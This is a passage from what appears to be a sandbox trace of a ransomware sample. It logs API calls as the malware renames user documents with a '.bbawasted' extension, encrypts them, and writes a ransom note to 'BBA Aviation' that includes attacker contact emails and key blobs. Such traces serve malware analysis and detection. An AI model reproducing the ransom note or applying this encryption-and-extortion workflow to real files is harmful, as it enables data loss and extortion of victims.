[end_key]\r\nKEEP IT\r\n") returned 984 [0217.826] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.826] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0217.826] SetEndOfFile (hFile=0x280) returned 1 [0217.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.829] CloseHandle (hObject=0x280) returned 1 [0217.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.829] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6780 | out: hHeap=0x660000) returned 1 [0217.829] _aulldvrm () returned 0x0 [0217.829] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a64e8) returned 1 [0217.830] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0217.830] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0217.830] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\UkWAql_Cev0PAc71UC.ppt") returned 65 [0217.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28c) returned 0x6aecf0 [0217.830] lstrcpyW (in: lpString1=0x6aed72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.830] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0217.831] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.831] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0217.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\UkWAql_Cev0PAc71UC.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ukwaql_cev0pac71uc.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0217.831] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.834] SetEndOfFile (hFile=0x280) returned 1 [0217.834] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.834] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.834] lstrcpyW (in: lpString1=0x6aed72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\UkWAql_Cev0PAc71UC.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ukwaql_cev0pac71uc.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\UkWAql_Cev0PAc71UC.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ukwaql_cev0pac71uc.ppt.bbawasted")) returned 1 [0217.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\UkWAql_Cev0PAc71UC.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\ukwaql_cev0pac71uc.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0217.838] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0217.839] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x18e0c [0217.839] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18e0c) returned 0x5f0000 [0217.839] CloseHandle (hObject=0x290) returned 1 [0217.842] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.844] CloseHandle (hObject=0x27c) returned 1 [0217.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0217.844] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0217.845] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0217.845] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0217.845] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0217.846] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0217.846] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0218.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0218.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.016] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZdIoaGwP4hvAwUKS5VOglD7GYvLmrZTCbQC9WkZYByvRsFNTqGqj8phyDuq5x3az\r\nnYMEoeJimNP0T5ta7VZ8ohUwTYXsQp0K+gPe7XYgDuNoK9m0Tao8RGTwu6q1LIoT\r\n0rqCIUC2vK0wIN4iZLq/CkRgfkPtok6koG2obXCDlIREsI+D77g4BABcrwVzLuX1\r\nY76AEugByDOckyG4ERYFR/ncFiqhzPew2nNuovew/T4ls92v39bXmEv3uI5gsO0X\r\nM3ICzJ1zeL4sQNtWFLJwIMvM4yQX7cQ4lWdgwbFXewKeNEnanMW/xg709w/bVa5h\r\nKWixCYDqdrqFtk68mUcf8JNJqLtv2Of5bUEElVkgNXz23p0/BRWrio69T13W9FIv\r\nwUGb/QA1Bx7i7gJaBl6dtlP/x0bPwhtHM0fGitwIkzJ7yiqhBvw2zneqmv7pQQ4+\r\n+uRBgKDRm59CWtrBgPNkHHjO630+LA884nAQF1Cymo8wFXwRoewGBGNnbZw6hWuz\r\nb0fnbhUKuLvy0Eo5vYN4Txpm7eeho1TT+u6ubQPbOL+qO/RKWJyYtPrysba7Fy92\r\n+YbxzNLOp+FHu834jhDlkqYC9wcXmF/ExTm7ZG+NApgQM8xRLHfN7+STbiwyH+tw\r\nob5GpRfbNaexsfTr2aR341xZ14EEbg9BIgA1ETVnU+t=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.016] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0218.016] SetEndOfFile (hFile=0x280) returned 1 [0218.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.040] CloseHandle (hObject=0x280) returned 1 [0218.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6940 | out: hHeap=0x660000) returned 1 [0218.041] _aulldvrm () returned 0x0 [0218.041] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0218.041] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0218.041] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0218.041] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\VJayKQ.xlsx") returned 46 [0218.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6c4b88 [0218.042] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.042] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.042] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0218.042] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0218.042] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0218.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\VJayKQ.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\vjaykq.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0218.043] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.045] SetEndOfFile (hFile=0x280) returned 1 [0218.045] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.045] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\VJayKQ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\vjaykq.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\VJayKQ.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\vjaykq.xlsx.bbawasted")) returned 1 [0218.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\VJayKQ.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\vjaykq.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0218.046] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0218.046] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xb185 [0218.046] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb185) returned 0x5f0000 [0218.047] CloseHandle (hObject=0x294) returned 1 [0218.048] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.049] CloseHandle (hObject=0x27c) returned 1 [0218.049] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0218.049] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0218.050] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0218.050] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0218.050] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6a38) returned 1 [0218.051] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0218.051] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0218.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0218.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.063] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tuu2I6RL/b9jSwU2GlM02mjryRCM4KTMroddVISa/rSYOWuQoXSbqlfJzdfDIXvY\r\nhIpfY2q4zRhzO/NxNH/PwcwsbpbU1GB1ixyVjE8okIr+lutEVvK/NZ2ODONNiUQk\r\nn0vCF3VKsZLnJ+zxFUWll5r64XdvwTSI457b8RtvjcdoCcbH8pRHPxYVy4n6g0nU\r\nybeAmmrKGM380IwVWwGvyMuLHpvqnmtW8kRez22Ndj5K5S/KwD8XA0ifFRZkhyXc\r\nZxaXP8UStt8Tb3ANyuNOAL6qE7FKvi9Ifmg5QAZP76jamzK6QWfWTP3PPLTk1MND\r\n79oRy9MK2LcBEernMXl/xpcrhmc4Gp53xsjVbSTzGNaaE845gFj009SDINW5/DXJ\r\nfhKU3Sr+GQCes93LlR8Zn7up3d0MyM1o2/FrfydqHsELQG7dDzAXxCVxN+Y+UjSL\r\nGsVPlJLjoc0QL4J7QtSxhiDwEFiXETQ9TymX/dcZbquhbZp1ONfBx9IropgCn1eU\r\nT8NGiRfWBELntPd4X9wuQjy6hDrD5L/SA51huWhVrnqaNDrlbpjjD8L7seuZ0vKz\r\nHRupMKIu4T8Jo1FNXh6lpeLP54fSa/hsm5zs52ka+qwAwSfSQB5OIuKnJTOy1XVQ\r\nz/su2MxIEJoqTkvDnEimpZIck85noyNwZwsvkdt9aoF=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.063] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0218.063] SetEndOfFile (hFile=0x280) returned 1 [0218.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.066] CloseHandle (hObject=0x280) returned 1 [0218.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.066] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af8c8 | out: hHeap=0x660000) returned 1 [0218.067] _aulldvrm () returned 0x0 [0218.067] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0218.067] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0218.067] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0218.067] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\yCxmECcxq_HNrPaRWp3E.docx") returned 60 [0218.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0218.068] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.068] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0218.068] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0218.068] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0218.068] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0218.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\yCxmECcxq_HNrPaRWp3E.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ycxmeccxq_hnrparwp3e.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0218.478] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0218.480] SetEndOfFile (hFile=0x280) returned 1 [0218.480] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0218.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0218.480] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0218.480] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\yCxmECcxq_HNrPaRWp3E.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ycxmeccxq_hnrparwp3e.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\yCxmECcxq_HNrPaRWp3E.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ycxmeccxq_hnrparwp3e.docx.bbawasted")) returned 1 [0218.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\yCxmECcxq_HNrPaRWp3E.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\ycxmeccxq_hnrparwp3e.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0218.481] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0218.482] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x5dcd [0218.482] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5dcd) returned 0x5f0000 [0218.482] CloseHandle (hObject=0x27c) returned 1 [0218.483] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0218.484] CloseHandle (hObject=0x294) returned 1 [0218.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0218.484] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0218.485] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0218.485] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0218.485] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0218.485] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0218.485] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0218.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0218.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0218.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.497] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MuJWp2PgONPR++gzDXurvnVZoka4CI4hBoyj3nPRLCsnuFpfI9/jT5itzMJX5rz7\r\nerB2pFauIgdouK6yYXhNfZfkKpb0sGoeHeqwAUHNAV86BZPgTtlkfYtfz6AxVQRV\r\n9ZyYaSTlX9HNpD+owZCsdf17mEsveb/k3PwvVslB3yuU2KFJhbNgwiUtdynts6QV\r\nLX6Qs133c7ScGCVT/Xqb4pPq3/sH4eqPI+rMZ2p4HtCBUv/lJ0tzOKhILSjMBSkD\r\nL96cqippRPls2FJOnMi/Z8guOdvnFIfnpILwilv2Q5RZ4CIlXXkgvCQfOCeB+sXJ\r\nxNpY0atgy7zrcd4cV+ibZV6rnQyBN14QGEkKMfCPuxT3RuS8caUA5aIXa05N4kEW\r\nPSepGhLuFDSVqGz+ylXevlDQzw6l+Wd9m7Tj7IT3VRQ+N4spBmip6ppT4TE/ErTR\r\nnYujwWf3ZaRRPmTmPUk4h8JKEA80NEn+MLFxtPogzULSHoXDVnp/OZi1b5VfaXaz\r\n+brweA1+UfSWotDOoSuPg5b3KgdvWMaAsIoZTyng7/V0YfZGUkKWsTHSi8fFlH+7\r\nvQI7gI8xNolrhv/tlynTV/owYTVXFepBlyn2wh1zCMbI7R/LL5YHrTgIqLAmPs+F\r\nVgrNY6RoxGuEVCMK7GK7XEWR0LhXkyUbyQ2WYrD4ZL3=[end_key]\r\nKEEP IT\r\n") returned 984 [0218.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0218.497] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0218.497] SetEndOfFile (hFile=0x280) returned 1 [0218.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0218.500] CloseHandle (hObject=0x280) returned 1 [0218.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0218.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a84e8 | out: hHeap=0x660000) returned 1 [0218.500] _aulldvrm () returned 0x0 [0218.500] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6790) returned 1 [0218.501] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0218.501] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0218.501] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\sAUHKrEmHnHKwb-hpI.pptx") returned 53 [0218.501] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0218.502] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0218.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0218.502] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6b48) returned 1 [0218.502] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0218.502] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0218.502] CreateFileW 